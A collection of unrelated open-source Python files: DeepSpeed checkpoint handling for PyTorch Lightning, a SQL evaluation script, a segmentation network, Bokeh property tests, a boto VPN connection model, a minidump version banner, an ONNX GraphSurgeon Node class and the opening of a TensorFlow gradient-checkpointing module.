return super().load_checkpoint(checkpoint_path)
# Rely on deepspeed to load the checkpoint and necessary information
from pytorch_lightning.trainer.states import TrainerFn
is_fitting = self.lightning_module.trainer.state.fn == TrainerFn.FITTING
_, client_state = self.deepspeed_engine.load_checkpoint(
checkpoint_path, load_optimizer_states=is_fitting, load_lr_scheduler_states=is_fitting
)
if client_state is None:
raise MisconfigurationException(
"DeepSpeed was unable to load the checkpoint. Ensure you passed in a DeepSpeed compatible checkpoint "
"or a single checkpoint file with `Trainer(plugins=DeepSpeedPlugin(load_full_weights=True))`."
)
return client_state
@property
def lightning_restore_optimizer_and_schedulers(self) -> bool:
# managed by DeepSpeed
if self.load_full_weights and self.zero_stage_3 and self.lightning_module.trainer.state.fn == TrainerFn.FITTING:
rank_zero_warn(
"A single checkpoint file has been given. This means optimizer states and "
"scheduler states can not be restored. If you'd like to restore these states, you must "
"provide a path to the originally saved DeepSpeed checkpoint."
)
return False
def load_model_state_dict(self, checkpoint: Mapping[str, Any]) -> None:
# override to do nothing, deepspeed engine already loaded the weights in `load_checkpoint()`
if self.load_full_weights and self.zero_stage_3:
self.model_to_device()
self._restore_zero_state(checkpoint)
def _restore_zero_state(self, ckpt: Mapping[str, Any]) -> None:
"""Overrides the normal load_state_dict behaviour in PyTorch to ensure we gather parameters that may be
sharded across processes before loading the state dictionary when using ZeRO stage 3. This is then
automatically synced across processes.
Args:
ckpt: The ckpt file.
"""
def load(module: torch.nn.Module, prefix=""):
missing_keys = []
unexpected_keys = []
error_msgs = []
state_dict = ckpt["state_dict"]
# copy state_dict so _load_from_state_dict can modify it
metadata = getattr(state_dict, "_metadata", None)
state_dict = state_dict.copy()
if metadata is not None:
state_dict._metadata = metadata
local_metadata = {} if metadata is None else metadata.get(prefix[:-1], {})
# because zero3 puts placeholders in model params, this context
# manager gathers (unpartitions) the params of the current layer, then loads from
# the state dict and then re-partitions them again
with deepspeed.zero.GatheredParameters(list(module.parameters(recurse=False)), modifier_rank=0):
if self.is_global_zero:
module._load_from_state_dict(
state_dict=state_dict,
prefix=prefix,
local_metadata=local_metadata,
strict=True,
missing_keys=missing_keys,
unexpected_keys=unexpected_keys,
error_msgs=error_msgs,
)
for name, child in module._modules.items():
if child is not None:
load(child, prefix + name + ".")
load(self.lightning_module, prefix="")
def load_optimizer_state_dict(self, checkpoint: Mapping[str, Any]) -> None:
# override to do nothing, deepspeed engine already loaded the states in `load_checkpoint()`
pass
@classmethod
def register_plugins(cls, plugin_registry: Dict) -> None:
plugin_registry.register("deepspeed", cls, description="Default DeepSpeed Plugin")
plugin_registry.register("deepspeed_stage_1", cls, description="DeepSpeed with ZeRO Stage 1 enabled", stage=1)
plugin_registry.register("deepspeed_stage_2", cls, description="DeepSpeed with ZeRO Stage 2 enabled", stage=2)
plugin_registry.register(
"deepspeed_stage_2_offload",
cls,
description="DeepSpeed ZeRO Stage 2 and CPU Offload",
stage=2,
offload_optimizer=True,
)
plugin_registry.register("deepspeed_stage_3", cls, description="DeepSpeed ZeRO Stage 3", stage=3)
plugin_registry.register(
"deepspeed_stage_3_offload",
cls,
description="DeepSpeed ZeRO Stage 3 and CPU Offload",
stage=3,
offload_optimizer=True,
offload_parameters=True,
)
plugin_registry.register(
"deepspeed_stage_3_offload_nvme",
cls,
description="DeepSpeed ZeRO Stage 3 and NVMe Offload",
stage=3,
offload_optimizer=True,
offload_parameters=True,
remote_device="nvme",
offload_params_device="nvme",
offload_optimizer_device="nvme",
)
@property
def checkpoint_io(self) -> CheckpointIO:
return self._checkpoint_io
@checkpoint_io.setter
def checkpoint_io(self, plugin: CheckpointIO) -> None:
raise MisconfigurationException("DeepSpeed currently does not support custom checkpoint plugins.")
def validation_step(self, *args, **kwargs):
return self.model(*args, **kwargs)
def test_step(self, *args, **kwargs):
return self.model(*args, **kwargs)
def predict_step(self, *args, **kwargs):
return self.model(*args, **kwargs)
|
# coding=utf8
import os
import re
import json
import argparse
from sql.evaluator import compare_sqls
def evaluate(path, timeout=120):
with open(path, 'r') as f:
predictions = json.load(f)
total = len(predictions)
correct = 0
for pidx, p in enumerate(predictions):
truth = p['truth_logical_form']
pred = p['predicted_logical_form']
if compare_sqls(truth, pred):
correct += 1
print("Total: %d, Correct: %d, Accuracy: %f" %
(total, correct, float(correct / total)))
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument(
'--predictions', help='file that stores the prediction results', required=True)
args = parser.parse_args()
evaluate(args.predictions)
|
import torch
import torch.nn as nn
import torch.nn.functional as F
from proj.archs.cluster.vgg import VGGNet
from proj.archs.segmentation.net10a import SegmentationNet10aTrunk, \
SegmentationNet10a
from proj.utils.segmentation.baselines.general import get_patches
__all__ = ["SegmentationNet10aDoersch"]
class DoerschHead(nn.Module):
def __init__(self, config):
super(DoerschHead, self).__init__()
self.patch_side = config.doersch_patch_side
self.siamese_branch = nn.Sequential(
nn.Conv2d(in_channels=SegmentationNet10a.cfg[-1][0], out_channels=1024,
kernel_size=3, stride=1, padding=1, bias=False),
nn.BatchNorm2d(1024),
nn.ReLU(inplace=True)
)
self.joint = nn.Sequential(
nn.Linear(2 * 1024 * self.patch_side * self.patch_side, 1024),
nn.ReLU(True),
nn.Dropout(),
nn.Linear(1024, 9) # 9 gt positions, N, NE... NW.
)
def forward(self, patches1, patches2):
patches1 = self.siamese_branch(patches1)
patches2 = self.siamese_branch(patches2)
ni, k, h, w = patches1.size()
ni2, k2, h2, w2 = patches1.size()
if not ((ni == ni2) and (k == k2) and (h == h2) and (w == w2) and \
(h == self.patch_side) and (w == self.patch_side)):
print(ni, k, h, w)
print(ni2, k2, h2, w2)
assert (False)
# flatten all but first dim
patches1 = patches1.contiguous() # otherwise view may behave funny
patches2 = patches2.contiguous()
patches1 = patches1.view(patches1.size(0), -1)
patches2 = patches2.view(patches2.size(0), -1)
concatenated = torch.cat((patches1, patches2), dim=1)
ni3, nf = concatenated.size()
if not ((ni3 == ni) and (nf == (2 * 1024 * self.patch_side *
self.patch_side))):
print(ni, k, h, w)
print(ni2, k2, h2, w2)
print(patches1.size())
print(patches2.size())
print(ni3, nf)
assert (False)
return self.joint(concatenated)
class SegmentationNet10aDoersch(VGGNet):
def __init__(self, config):
super(SegmentationNet10aDoersch, self).__init__()
self.patch_side = config.doersch_patch_side
self.input_sz = config.input_sz
self.features_sz = SegmentationNet10a.cfg[-1][0]
print("SegmentationNet10aDoersch: %d %d %d" % (self.patch_side,
self.input_sz,
self.features_sz))
self.features = SegmentationNet10aTrunk(config, cfg=SegmentationNet10a.cfg)
self.doersch_head = DoerschHead(config)
self._initialize_weights()
def forward(self, x, centre=None, other=None, penultimate=False):
x = self.features(x)
x = F.interpolate(x, size=self.input_sz, mode="bilinear")
if not penultimate:
assert ((centre is not None) and (other is not None))
patches1, patches2 = \
get_patches(x, centre, other, self.patch_side)
# predicted position distribution, no softmax - using
# torch.CrossEntropyLoss
# shape: bn, 9
x = self.doersch_head(patches1, patches2)
return x
|
#-----------------------------------------------------------------------------
# Copyright (c) 2012 - 2022, Anaconda, Inc., and Bokeh Contributors.
# All rights reserved.
#
# The full license is in the file LICENSE.txt, distributed with this software.
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Boilerplate
#-----------------------------------------------------------------------------
from __future__ import annotations # isort:skip
import pytest ; pytest
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
# External imports
import numpy as np
# Bokeh imports
from bokeh._testing.util.api import verify_all
from bokeh.core.has_props import HasProps
from bokeh.core.properties import (
Alias,
Dict,
Enum,
Float,
Instance,
Int,
List,
Nullable,
NumberSpec,
Override,
String,
)
from bokeh.models import Plot
# Module under test
import bokeh.core.properties as bcp # isort:skip
#-----------------------------------------------------------------------------
# Setup
#-----------------------------------------------------------------------------
ALL = (
'Alias',
'Alpha',
'AlphaSpec',
'Angle',
'AngleSpec',
'Any',
'AnyRef',
'Array',
'Auto',
'Base64String',
'Bool',
'Byte',
'Color',
'ColorHex',
'ColorSpec',
'ColumnData',
'Complex',
'DashPattern',
'DataSpec',
'Date',
'Datetime',
'Dict',
'DistanceSpec',
'Either',
'Enum',
'Factor',
'FactorSeq',
'Float',
'FontSize',
'FontSizeSpec',
'HatchPatternSpec',
'HatchPatternType',
'Image',
'Include',
'Instance',
'Int',
'Interval',
'JSON',
'List',
'MarkerSpec',
'MarkerType',
'MathString',
'MinMaxBounds',
'NonNegativeInt',
'NonNullable',
'Null',
'NullStringSpec',
'Nullable',
'NumberSpec',
'Override',
'PandasDataFrame',
'PandasGroupBy',
'Percent',
'PositiveInt',
'RGB',
'Readonly',
'Regex',
'RelativeDelta',
'RestrictedDict',
'Seq',
'Size',
'SizeSpec',
'String',
'StringSpec',
'Struct',
'TimeDelta',
'TextLike',
'Tuple',
'UnitsSpec',
'expr',
'field',
'validate',
'value',
'without_property_validation'
)
#-----------------------------------------------------------------------------
# General API
#----------------------------------------------------------------------------
# TODO (bev) These tests should be moved to better places
class TestBasic:
def test_simple_class(self) -> None:
class Foo(HasProps):
x = Int(12)
y = String("hello")
z = List(Int, [1, 2, 3])
zz = Dict(String, Int)
s = Nullable(String(None))
f = Foo()
assert f.x == 12
assert f.y == "hello"
assert np.array_equal(np.array([1, 2, 3]), f.z)
assert f.s is None
assert {"x", "y", "z", "zz", "s"} == f.properties()
with_defaults = f.properties_with_values(include_defaults=True)
assert dict(x=12, y="hello", z=[1,2,3], zz={}, s=None) == with_defaults
without_defaults = f.properties_with_values(include_defaults=False)
assert dict() == without_defaults
f.x = 18
assert f.x == 18
f.y = "bar"
assert f.y == "bar"
without_defaults = f.properties_with_values(include_defaults=False)
assert dict(x=18, y="bar") == without_defaults
f.z[0] = 100
without_defaults = f.properties_with_values(include_defaults=False)
assert dict(x=18, y="bar", z=[100,2,3]) == without_defaults
f.zz = {'a': 10}
without_defaults = f.properties_with_values(include_defaults=False)
assert dict(x=18, y="bar", z=[100,2,3], zz={'a': 10}) == without_defaults
def test_enum(self) -> None:
class Foo(HasProps):
x = Enum("blue", "red", "green") # the first item is the default
y = Enum("small", "medium", "large", default="large")
f = Foo()
assert f.x == "blue"
assert f.y == "large"
f.x = "red"
assert f.x == "red"
with pytest.raises(ValueError):
f.x = "yellow"
f.y = "small"
assert f.y == "small"
with pytest.raises(ValueError):
f.y = "yellow"
def test_inheritance(self) -> None:
class Base(HasProps):
x = Int(12)
y = String("hello")
class Child(Base):
z = Float(3.14)
c = Child()
assert frozenset(['x', 'y', 'z']) == frozenset(c.properties())
assert c.y == "hello"
def test_set(self) -> None:
class Foo(HasProps):
x = Int(12)
y = Enum("red", "blue", "green")
z = String("blah")
f = Foo()
assert f.x == 12
assert f.y == "red"
assert f.z == "blah"
f.update(**dict(x=20, y="green", z="hello"))
assert f.x == 20
assert f.y == "green"
assert f.z == "hello"
with pytest.raises(ValueError):
f.update(y="orange")
def test_accurate_properties_sets(self) -> None:
class Base(HasProps):
num = Int(12)
container = List(String)
child = Instance(HasProps)
class Mixin(HasProps):
mixin_num = Int(12)
mixin_container = List(String)
mixin_child = Instance(HasProps)
class Sub(Base, Mixin):
sub_num = Int(12)
sub_container = List(String)
sub_child = Instance(HasProps)
b = Base()
assert {"child"} == set(b.properties_with_refs())
assert {"num", "container", "child"} == b.properties()
m = Mixin()
assert set(m.properties_with_refs()) == {"mixin_child"}
assert m.properties() == {"mixin_num", "mixin_container", "mixin_child"}
s = Sub()
assert set(s.properties_with_refs()) == {"child", "sub_child", "mixin_child"}
assert s.properties() == {"num", "container", "child", "mixin_num", "mixin_container", "mixin_child", "sub_num", "sub_container", "sub_child"}
# verify caching
assert s.properties_with_refs() is s.properties_with_refs()
assert s.properties() is s.properties()
def test_accurate_dataspecs(self) -> None:
class Base(HasProps):
num = NumberSpec(12)
not_a_dataspec = Float(10)
class Mixin(HasProps):
mixin_num = NumberSpec(14)
class Sub(Base, Mixin):
sub_num = NumberSpec(16)
base = Base()
mixin = Mixin()
sub = Sub()
assert {"num"} == set(base.dataspecs())
assert {"mixin_num"} == set(mixin.dataspecs())
assert {"num", "mixin_num", "sub_num"} == set(sub.dataspecs())
def test_not_serialized(self) -> None:
class NotSerialized(HasProps):
x = Int(12, serialized=False)
y = String("hello")
o = NotSerialized()
assert o.x == 12
assert o.y == 'hello'
# non-serialized props are still in the list of props
assert 'x' in o.properties()
assert 'y' in o.properties()
# but they aren't in the dict of props with values, since their
# values are not important (already included in other values,
# as with the _units properties)
assert 'x' not in o.properties_with_values(include_defaults=True)
assert 'y' in o.properties_with_values(include_defaults=True)
assert 'x' not in o.properties_with_values(include_defaults=False)
assert 'y' not in o.properties_with_values(include_defaults=False)
o.x = 42
o.y = 'world'
assert 'x' not in o.properties_with_values(include_defaults=True)
assert 'y' in o.properties_with_values(include_defaults=True)
assert 'x' not in o.properties_with_values(include_defaults=False)
assert 'y' in o.properties_with_values(include_defaults=False)
def test_readonly(self) -> None:
class Readonly(HasProps):
x = Int(12, readonly=True) # with default
y = Nullable(Int(), readonly=True) # without default
z = String("hello")
o = Readonly()
assert o.x == 12
assert o.y == None
assert o.z == 'hello'
# readonly props are still in the list of props
assert 'x' in o.properties()
assert 'y' in o.properties()
assert 'z' in o.properties()
assert 'x' in o.properties_with_values(include_defaults=True)
assert 'y' in o.properties_with_values(include_defaults=True)
assert 'z' in o.properties_with_values(include_defaults=True)
assert 'x' not in o.properties_with_values(include_defaults=False)
assert 'y' not in o.properties_with_values(include_defaults=False)
assert 'z' not in o.properties_with_values(include_defaults=False)
with pytest.raises(RuntimeError):
o.x = 7
with pytest.raises(RuntimeError):
o.y = 7
o.z = "xyz"
assert o.x == 12
assert o.y == None
assert o.z == 'xyz'
def test_include_defaults(self) -> None:
class IncludeDefaultsTest(HasProps):
x = Int(12)
y = String("hello")
o = IncludeDefaultsTest()
assert o.x == 12
assert o.y == 'hello'
assert 'x' in o.properties_with_values(include_defaults=True)
assert 'y' in o.properties_with_values(include_defaults=True)
assert 'x' not in o.properties_with_values(include_defaults=False)
assert 'y' not in o.properties_with_values(include_defaults=False)
o.x = 42
o.y = 'world'
assert 'x' in o.properties_with_values(include_defaults=True)
assert 'y' in o.properties_with_values(include_defaults=True)
assert 'x' in o.properties_with_values(include_defaults=False)
assert 'y' in o.properties_with_values(include_defaults=False)
def test_include_defaults_with_kwargs(self) -> None:
class IncludeDefaultsKwargsTest(HasProps):
x = Int(12)
y = String("hello")
o = IncludeDefaultsKwargsTest(x=14, y="world")
assert o.x == 14
assert o.y == 'world'
assert 'x' in o.properties_with_values(include_defaults=True)
assert 'y' in o.properties_with_values(include_defaults=True)
assert 'x' in o.properties_with_values(include_defaults=False)
assert 'y' in o.properties_with_values(include_defaults=False)
def test_include_defaults_set_to_same(self) -> None:
class IncludeDefaultsSetToSameTest(HasProps):
x = Int(12)
y = String("hello")
o = IncludeDefaultsSetToSameTest()
assert 'x' in o.properties_with_values(include_defaults=True)
assert 'y' in o.properties_with_values(include_defaults=True)
assert 'x' not in o.properties_with_values(include_defaults=False)
assert 'y' not in o.properties_with_values(include_defaults=False)
# this should no-op
o.x = 12
o.y = "hello"
assert 'x' in o.properties_with_values(include_defaults=True)
assert 'y' in o.properties_with_values(include_defaults=True)
assert 'x' not in o.properties_with_values(include_defaults=False)
assert 'y' not in o.properties_with_values(include_defaults=False)
def test_override_defaults(self) -> None:
class FooBase(HasProps):
x = Int(12)
class FooSub(FooBase):
x = Override(default=14)
def func_default():
return 16
class FooSubSub(FooBase):
x = Override(default=func_default)
f_base = FooBase()
f_sub = FooSub()
f_sub_sub = FooSubSub()
assert f_base.x == 12
assert f_sub.x == 14
assert f_sub_sub.x == 16
assert 12 == f_base.properties_with_values(include_defaults=True)['x']
assert 14 == f_sub.properties_with_values(include_defaults=True)['x']
assert 16 == f_sub_sub.properties_with_values(include_defaults=True)['x']
assert 'x' not in f_base.properties_with_values(include_defaults=False)
assert 'x' not in f_sub.properties_with_values(include_defaults=False)
assert 'x' in f_sub_sub.properties_with_values(include_defaults=False)
# def test_kwargs_init(self) -> None:
# class Foo(HasProps):
# x = String
# y = Int
# z = Float
# f = Foo(x = "hello", y = 14)
# assert f.x == "hello"
# assert f.y == 14
# with pytest.raises(TypeError):
# # This should raise a TypeError: object.__init__() takes no parameters
# g = Foo(z = 3.14, q = "blah")
class Foo(HasProps):
pass
class Bar(HasProps):
pass
class Baz(HasProps):
pass
def test_HasProps_equals() -> None:
class Foo(HasProps):
x = Int(12)
y = String("hello")
z = List(Int, [1,2,3])
class FooUnrelated(HasProps):
x = Int(12)
y = String("hello")
z = List(Int, [1,2,3])
v = Foo().equals(Foo())
assert v is True
v = Foo(x=1).equals(Foo(x=1))
assert v is True
v = Foo(x=1).equals(Foo(x=2))
assert v is False
v = Foo(x=1).equals(1)
assert v is False
v = Foo().equals(FooUnrelated())
assert v is False
def test_HasProps_clone() -> None:
p1 = Plot(width=1000)
c1 = p1.properties_with_values(include_defaults=False)
p2 = p1._clone()
c2 = p2.properties_with_values(include_defaults=False)
assert c1 == c2
def test_Alias() -> None:
class Foo(HasProps):
x = Int(12)
ax = Alias('x')
f = Foo(x=10)
assert f.x == 10
assert f.ax == 10
f.x = 20
assert f.x == 20
assert f.ax == 20
f.ax = 30
assert f.x == 30
assert f.ax == 30
#-----------------------------------------------------------------------------
# Dev API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Private API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Code
#-----------------------------------------------------------------------------
Test___all__ = verify_all(bcp, ALL)
|
# Copyright (c) 2009-2010 Mitch Garnaat http://garnaat.org/
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
import boto
from datetime import datetime
from boto.resultset import ResultSet
"""
Represents a VPN Connectionn
"""
from boto.ec2.ec2object import TaggedEC2Object
class VpnConnectionOptions(object):
"""
Represents VPN connection options
:ivar static_routes_only: Indicates whether the VPN connection uses static
routes only. Static routes must be used for devices that don't support
BGP.
"""
def __init__(self, static_routes_only=None, tunnel_options=None):
self.static_routes_only = static_routes_only
self.tunnel_options = tunnel_options
def __repr__(self):
return 'VpnConnectionOptions'
def startElement(self, name, attrs, connection):
pass
def endElement(self, name, value, connection):
if name == 'staticRoutesOnly':
self.static_routes_only = True if value == 'true' else False
elif name == 'tunnelOptions':
self.tunnel_options = value
else:
setattr(self, name, value)
class VpnStaticRoute(object):
"""
Represents a static route for a VPN connection.
:ivar destination_cidr_block: The CIDR block associated with the local
subnet of the customer data center.
:ivar source: Indicates how the routes were provided.
:ivar state: The current state of the static route.
"""
def __init__(self, destination_cidr_block=None, source=None, state=None):
self.destination_cidr_block = destination_cidr_block
self.source = source
self.available = state
def __repr__(self):
return 'VpnStaticRoute: %s' % self.destination_cidr_block
def startElement(self, name, attrs, connection):
pass
def endElement(self, name, value, connection):
if name == 'destinationCidrBlock':
self.destination_cidr_block = value
elif name == 'source':
self.source = value
elif name == 'state':
self.state = value
else:
setattr(self, name, value)
class VpnTunnel(object):
"""
Represents telemetry for a VPN tunnel
:ivar outside_ip_address: The Internet-routable IP address of the
virtual private gateway's outside interface.
:ivar status: The status of the VPN tunnel. Valid values: UP | DOWN
:ivar last_status_change: The date and time of the last change in status.
:ivar status_message: If an error occurs, a description of the error.
:ivar accepted_route_count: The number of accepted routes.
"""
def __init__(self, outside_ip_address=None, status=None, last_status_change=None,
status_message=None, accepted_route_count=None):
self.outside_ip_address = outside_ip_address
self.status = status
self.last_status_change = last_status_change
self.status_message = status_message
self.accepted_route_count = accepted_route_count
def __repr__(self):
return 'VpnTunnel: %s' % self.outside_ip_address
def startElement(self, name, attrs, connection):
pass
def endElement(self, name, value, connection):
if name == 'outsideIpAddress':
self.outside_ip_address = value
elif name == 'status':
self.status = value
elif name == 'lastStatusChange':
self.last_status_change = datetime.strptime(value,
'%Y-%m-%dT%H:%M:%S.%fZ')
elif name == 'statusMessage':
self.status_message = value
elif name == 'acceptedRouteCount':
try:
value = int(value)
except ValueError:
boto.log.warning('Error converting code (%s) to int' % value)
self.accepted_route_count = value
else:
setattr(self, name, value)
class VpnConnection(TaggedEC2Object):
"""
Represents a VPN Connection
:ivar id: The ID of the VPN connection.
:ivar state: The current state of the VPN connection.
Valid values: pending | available | deleting | deleted
:ivar customer_gateway_configuration: The configuration information for the
VPN connection's customer gateway (in the native XML format). This
element is always present in the
:class:`boto.vpc.VPCConnection.create_vpn_connection` response;
however, it's present in the
:class:`boto.vpc.VPCConnection.get_all_vpn_connections` response only
if the VPN connection is in the pending or available state.
:ivar type: The type of VPN connection (ipsec.1).
:ivar customer_gateway_id: The ID of the customer gateway at your end of
the VPN connection.
:ivar vpn_gateway_id: The ID of the virtual private gateway
at the AWS side of the VPN connection.
:ivar tunnels: A list of the vpn tunnels (always 2)
:ivar options: The option set describing the VPN connection.
:ivar static_routes: A list of static routes associated with a VPN
connection.
"""
def __init__(self, connection=None):
super(VpnConnection, self).__init__(connection)
self.id = None
self.state = None
self.customer_gateway_configuration = None
self.type = None
self.customer_gateway_id = None
self.vpn_gateway_id = None
self.tunnels = []
self.options = None
self.static_routes = []
def __repr__(self):
return 'VpnConnection:%s' % self.id
def startElement(self, name, attrs, connection):
retval = super(VpnConnection, self).startElement(name, attrs, connection)
if retval is not None:
return retval
if name == 'vgwTelemetry':
self.tunnels = ResultSet([('item', VpnTunnel)])
return self.tunnels
elif name == 'routes':
self.static_routes = ResultSet([('item', VpnStaticRoute)])
return self.static_routes
elif name == 'options':
self.options = VpnConnectionOptions()
return self.options
return None
def endElement(self, name, value, connection):
if name == 'vpnConnectionId':
self.id = value
elif name == 'state':
self.state = value
elif name == 'customerGatewayConfiguration':
self.customer_gateway_configuration = value
elif name == 'type':
self.type = value
elif name == 'customerGatewayId':
self.customer_gateway_id = value
elif name == 'vpnGatewayId':
self.vpn_gateway_id = value
else:
setattr(self, name, value)
def delete(self, dry_run=False):
return self.connection.delete_vpn_connection(
self.id,
dry_run=dry_run
)
|
__version__ = "0.0.18"
__banner__ = \
"""
# minidump %s
# Author: Tamas Jos @skelsec (skelsecprojects@gmail.com)
""" % __version__
|
#
# SPDX-FileCopyrightText: Copyright (c) 1993-2022 NVIDIA CORPORATION & AFFILIATES. All rights reserved.
# SPDX-License-Identifier: Apache-2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from onnx_graphsurgeon.logger.logger import G_LOGGER
from onnx_graphsurgeon.ir.tensor import Tensor
from onnx_graphsurgeon.util import misc
from collections import OrderedDict
from typing import List, Dict
class Node(object):
def __init__(
self,
op: str,
name: str = None,
attrs: Dict[str, object] = None,
inputs: List["Tensor"] = None,
outputs: List["Tensor"] = None,
):
"""
A node represents an operation in a graph, and consumes zero or more Tensors, and produces zero or more Tensors.
Args:
op (str): The operation this node performs.
name (str): The name of this node.
attrs (Dict[str, object]): A dictionary that maps attribute names to their values.
inputs (List[Tensor]): A list of zero or more input Tensors.
outputs (List[Tensor]): A list of zero or more output Tensors.
"""
self.op = op
self.name = misc.default_value(name, "")
self.attrs = misc.default_value(attrs, OrderedDict())
self.inputs = misc.SynchronizedList(self, field_name="outputs", initial=misc.default_value(inputs, []))
self.outputs = misc.SynchronizedList(self, field_name="inputs", initial=misc.default_value(outputs, []))
def i(self, tensor_idx=0, producer_idx=0):
"""
Convenience function to get a producer node of one of this node's input tensors.
Note that the parameters are swapped compared to the o() function; this is because tensors are likely to have only a single producer
For example:
::
assert node.i() == node.inputs[0].inputs[0]
assert node.i(1, 2) == node.inputs[1].inputs[2]
Args:
tensor_idx (int): The index of the input tensor of this node. Defaults to 0.
producer_idx (int): The index of the producer of the input tensor, if the tensor has multiple producers. Defaults to 0
Returns:
Node: The specified producer (input) node.
"""
return self.inputs[tensor_idx].inputs[producer_idx]
def o(self, consumer_idx=0, tensor_idx=0):
"""
Convenience function to get a consumer node of one of this node's output tensors.
For example:
::
assert node.o() == node.outputs[0].outputs[0]
assert node.o(2, 1) == node.outputs[1].outputs[2]
Args:
consumer_idx (int): The index of the consumer of the input tensor. Defaults to 0.
tensor_idx (int): The index of the output tensor of this node, if the node has multiple outputs. Defaults to 0.
Returns:
Node: The specified consumer (output) node
"""
return self.outputs[tensor_idx].outputs[consumer_idx]
def __setattr__(self, name, value):
if name in ["inputs", "outputs"]:
try:
getattr(self, name).clear()
getattr(self, name).extend(value)
except AttributeError:
super().__setattr__(name, value)
else:
super().__setattr__(name, value)
def copy(self, inputs: List["Tensor"] = None, outputs: List["Tensor"] = None, tensor_map=None):
"""
Makes a shallow copy of this node, overriding input and output information.
Note: Generally, you should only ever make a copy of a Graph.
"""
from onnx_graphsurgeon.ir.graph import Graph
new_attrs = OrderedDict()
for name, attr in self.attrs.items():
if isinstance(attr, Graph):
new_attrs[name] = attr.copy(tensor_map)
else:
new_attrs[name] = attr
return Node(self.op, self.name, new_attrs, inputs=inputs, outputs=outputs)
def __str__(self):
ret = "{:} ({:})".format(self.name, self.op)
def add_io(name, io):
nonlocal ret
ret += "\n\t{:}: [".format(name)
for elem in io:
ret += "\n\t\t{:}".format(elem)
ret += "\n\t]"
add_io("Inputs", self.inputs)
add_io("Outputs", self.outputs)
if self.attrs:
ret += "\nAttributes: {:}".format(self.attrs)
return ret
def __repr__(self):
return self.__str__()
def __eq__(self, other):
"""
Check whether two nodes are equal by comparing name, attributes, op, inputs, and outputs.
"""
G_LOGGER.verbose("Comparing node: {:} with {:}".format(self.name, other.name))
attrs_match = self.name == other.name and self.op == other.op and self.attrs == other.attrs
inputs_match = len(self.inputs) == len(other.inputs) and all(
[inp == other_inp for inp, other_inp in zip(self.inputs, other.inputs)]
)
outputs_match = len(self.outputs) == len(other.outputs) and all(
[out == other_out for out, other_out in zip(self.outputs, other.outputs)]
)
return attrs_match and inputs_match and outputs_match
|
from toposort import toposort
import contextlib
import numpy as np
import tensorflow as tf
import tensorflow.contrib.graph_editor as ge
import time
import sys
sys.setrecursionlimit(10000)
# refers back to current module if we decide to split helpers out
util = sys.modules[__name__]
# getting rid of "WARNING:tensorflow:VARIABLES collection name is deprecated"
setattr(tf.GraphKeys, "VARIABLES", "variables")
# save original gradients since tf.gradient could be monkey-patched to point
# to our version
from tensorflow.python.ops import gradients as tf_gradients_lib
tf_gradients = tf_gradients_lib.gradients
MIN_CHECKPOINT_NODE_SIZE=1024 # use lower value during testing
# specific versions we can use to do process-wide replacement of tf.gradients
def gradients_speed(ys, xs, grad_ys=None, **kwargs):
return gradients(ys, xs, grad_ys, checkpoints='speed', **kwargs)
def gradients_memory(ys, xs, grad_ys=None, **kwargs):
return gradients(ys, xs, grad_ys, checkpoints='memory', **kwargs)
def gradients_collection(ys, xs, grad_ys=None, **kwargs):
return gradients(ys, xs, grad_ys, checkpoints='collection', **kwargs)
def gradients(ys, xs, grad_ys=None, checkpoints='collection', **kwargs):
'''
Authors: Tim Salimans & Yaroslav Bulatov
memory efficient gradient implementation inspired by "Training Deep Nets with Sublinear Memory Cost"
by Chen et al. 2016 (https://arxiv.org/abs/1604.06174)
ys,xs,grad_ys,kwargs are the arguments to standard tensorflow tf.gradients
(https://www.tensorflow.org/versions/r0.12/api_docs/python/train.html#gradients)
'checkpoints' can either be
- a list consisting of tensors from the forward pass of the neural net
that we should re-use when calculating the gradients in the backward pass
all other tensors that do not appear in this list will be re-computed
- a string specifying how this list should be determined. currently we support
- 'speed': checkpoint all outputs of convolutions and matmuls. these ops are usually the most expensive,
so checkpointing them maximizes the running speed
(this is a good option if nonlinearities, concats, batchnorms, etc are taking up a lot of memory)
- 'memory': try to minimize the memory usage
(currently using a very simple strategy that identifies a number of bottleneck tensors in the graph to checkpoint)
- 'collection': look for a tensorflow collection named 'checkpoints', which holds the tensors to checkpoint
'''
# print("Calling memsaving gradients with", checkpoints)
if not isinstance(ys,list):
ys = [ys]
if not isinstance(xs,list):
xs = [xs]
bwd_ops = ge.get_backward_walk_ops([y.op for y in ys],
inclusive=True)
debug_print("bwd_ops: %s", bwd_ops)
# forward ops are all ops that are candidates for recomputation
fwd_ops = ge.get_forward_walk_ops([x.op for x in xs],
inclusive=True,
within_ops=bwd_ops)
debug_print("fwd_ops: %s", fwd_ops)
# exclude ops with no inputs
fwd_ops = [op for op in fwd_ops if op.inputs]
# don't recompute xs, remove variables
xs_ops = _to_ops(xs)
fwd_ops = [op for op in fwd_ops if not op in xs_ops]
fwd_ops = [op for op in fwd_ops if not '/assign' in op.name]
fwd_ops = [op for op in fwd_ops if not '/Assign' in op.name]
